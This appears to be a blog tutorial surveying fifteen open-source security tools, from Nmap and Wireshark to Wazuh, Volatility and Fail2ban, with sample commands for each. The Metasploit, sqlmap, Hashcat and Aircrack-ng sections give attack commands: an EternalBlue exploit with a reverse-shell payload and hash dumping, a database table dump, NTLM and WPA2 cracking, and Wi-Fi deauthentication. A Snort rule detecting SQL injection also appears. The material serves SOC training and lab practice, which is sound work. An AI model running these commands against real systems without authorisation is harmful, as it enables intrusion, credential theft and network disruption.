Why Open-Source Security Tools Matter
Open-source cybersecurity tools power some of the world’s most sophisticated security operations centers. They’re free, community-vetted, constantly updated, and often more capable than paid alternatives. Whether you’re a solo analyst, a startup SOC, or a Fortune 500 team, these tools belong in your arsenal.
1. Nmap — Network Discovery & Port Scanning
Nmap is the gold standard for network reconnaissance. It discovers hosts, open ports, running services, and operating system fingerprints.
# Install on Ubuntu/Debian
sudo apt install nmap
# Basic host discovery across subnet
nmap -sn 192.168.1.0/24
# Aggressive scan: OS, version, scripts, traceroute
nmap -A -T4 192.168.1.100
# Scan for known vulnerabilities
nmap --script vuln 192.168.1.100
# Stealth SYN scan (requires root)
sudo nmap -sS -p 1-65535 192.168.1.100
# Save results to XML
nmap -oX scan_results.xml 192.168.1.0/24Real use case: A SOC analyst runs Nmap on a newly acquired company’s network before a formal pentest. They discover 47 RDP ports (3389) open externally — a critical finding the IT team had no record of.
2. Wireshark — Packet Capture & Analysis
Wireshark captures and dissects network traffic in real time. It’s essential for incident response, malware analysis, and troubleshooting.
# Capture on eth0 interface, save to file
sudo tshark -i eth0 -w capture.pcap
# Display only HTTP traffic
tshark -r capture.pcap -Y "http"
# Find DNS queries (detect DNS tunneling)
tshark -r capture.pcap -Y "dns" -T fields -e dns.qry.name
# Detect ARP spoofing
tshark -r capture.pcap -Y "arp.duplicate-address-detected"
# Extract HTTP transferred files
tshark -r capture.pcap --export-objects http,./extracted/Key display filters: ip.addr == 10.0.0.5 filters a specific host, http.request.method == "POST" shows credential submissions, tcp.flags.syn == 1 && tcp.flags.ack == 0 shows SYN scans.
3. Metasploit Framework — Penetration Testing
The world’s most widely used penetration testing framework. Contains thousands of exploits, payloads, encoders, and post-exploitation modules.
# Start Metasploit
msfconsole
# Search for exploits
msf6 > search type:exploit platform:windows smb
msf6 > search eternalblue
# Use EternalBlue (MS17-010)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > run
# Post-exploitation
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > run post/multi/recon/local_exploit_suggester4. Snort — Network Intrusion Detection
# Run Snort in IDS mode
sudo snort -i eth0 -c /etc/snort/snort.conf -A console
# Custom rule: detect ICMP ping
alert icmp any any -> $HOME_NET any (msg:"ICMP Ping"; sid:1000001; rev:1;)
# Detect SQL injection attempt
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQLi UNION SELECT"; content:"UNION SELECT"; nocase; sid:1000002; rev:1;)5. Wazuh — Open-Source SIEM & XDR
Wazuh combines log analysis, file integrity monitoring, vulnerability detection, and active response into one platform — completely free and open-source.
# Quick deploy with Docker
git clone https://github.com/wazuh/wazuh-docker.git -b v4.7.0
cd wazuh-docker/single-node
docker-compose -f generate-indexer-certs.yml run --rm generator
docker-compose up -d
# Install agent on Linux
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --import
sudo WAZUH_MANAGER='WAZUH_IP' apt install wazuh-agent
sudo systemctl start wazuh-agent
# Monitor real-time alerts
tail -f /var/ossec/logs/alerts/alerts.log6. Volatility 3 — Memory Forensics
Volatility analyzes RAM memory dumps to uncover malware hiding in memory — rootkits, injected code, encryption keys, and evidence invisible on disk.
pip3 install volatility3
# Identify OS of memory dump
vol.py -f memory.dmp windows.info
# List running processes
vol.py -f memory.dmp windows.pslist
# Detect process injection / hollowing
vol.py -f memory.dmp windows.malfind
# Show active network connections at capture time
vol.py -f memory.dmp windows.netstat
# Extract suspicious process to disk
vol.py -f memory.dmp windows.dumpfiles --pid 1234 --output-dir ./dumps/
# Check persistence keys
vol.py -f memory.dmp windows.registry.printkey --key "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"7. TheHive — Incident Response Platform
TheHive lets SOC teams create, manage, and collaborate on security incidents and investigations. Integrates natively with MISP and Cortex for threat intel enrichment.
# Create alert via TheHive API
curl -X POST http://localhost:9000/api/v1/alert -H "Authorization: Bearer YOUR_KEY" -H "Content-Type: application/json" -d '{
"type": "phishing",
"title": "Credential phishing targeting finance team",
"severity": 2,
"tags": ["phishing","finance","malware"]
}'8. MISP — Threat Intelligence Sharing
MISP stores and shares Indicators of Compromise (IoCs): malicious IPs, domains, file hashes, and attack patterns. Used by national CERTs and thousands of organizations worldwide.
# Add an IoC via MISP API
curl -H "Authorization: YOUR_API_KEY" -H "Content-Type: application/json" -X POST https://your-misp.local/attributes/add/EVENT_ID -d '{"type":"ip-dst","value":"185.220.101.45","to_ids":true}'
# Search for an IP
curl -H "Authorization: YOUR_API_KEY" https://your-misp.local/attributes/restSearch/value:185.220.101.459. OpenVAS / Greenbone — Vulnerability Scanner
# Quick start with Docker
docker run -d -p 443:9392 -e PASSWORD="admin123" --name openvas mikesplain/openvas
# Or native install
sudo apt install gvm
sudo gvm-setup && sudo gvm-start
# Access at https://localhost:939210. Zeek — Network Traffic Analysis
Zeek passively monitors networks and generates rich structured logs — connection, DNS, HTTP, SSL, and files logs — perfect for threat hunting and forensic investigation.
# Analyze a PCAP
zeek -r capture.pcap
# Find large data transfers (data exfiltration indicator)
cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | sort -k3 -rn | head -20
# Find connections to external IPs with long duration (C2 beaconing)
cat conn.log | zeek-cut id.orig_h id.resp_h duration | awk '$3 > 3600'11. Burp Suite Community — Web App Security
# SQLMAP - automated SQL injection testing
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D dbname --tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
# Nikto - web server vulnerability scanner
nikto -h http://target.com
# gobuster - directory/file brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt12. Hashcat — GPU Password Cracking
# Crack NTLM hashes (Windows passwords)
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
# Crack MD5
hashcat -m 0 md5_hashes.txt rockyou.txt
# Use rules for mangling (adds numbers, special chars)
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Mask attack (brute force pattern)
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?d?d?d?d13. Aircrack-ng — Wireless Security
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Capture handshakes
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack to force handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA2 password
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt14. Fail2ban — Automated Intrusion Prevention
sudo apt install fail2ban
# Configure /etc/fail2ban/jail.local
[sshd]
enabled = true
port = ssh
maxretry = 5
bantime = 3600
findtime = 600
# Check banned IPs
sudo fail2ban-client status sshd
# Manually ban/unban
sudo fail2ban-client set sshd banip 192.168.1.100
sudo fail2ban-client set sshd unbanip 192.168.1.10015. Lynis — Linux Security Auditing
# Install and run full audit
sudo apt install lynis
sudo lynis audit system
# Key sections to check in report:
# - Authentication
# - File permissions
# - Kernel parameters
# - Software updates
# - Firewall status
# View report
cat /var/log/lynis-report.dat | grep "warning|suggestion"Building Your Free Home Lab
You don’t need expensive hardware. A laptop with 16GB RAM running VirtualBox can host Kali Linux (attacker), Metasploitable 3 (target), and Wazuh (SIEM) simultaneously. Practice legally on TryHackMe, HackTheBox, and VulnHub — all offer free tiers with guided exercises perfect for beginners.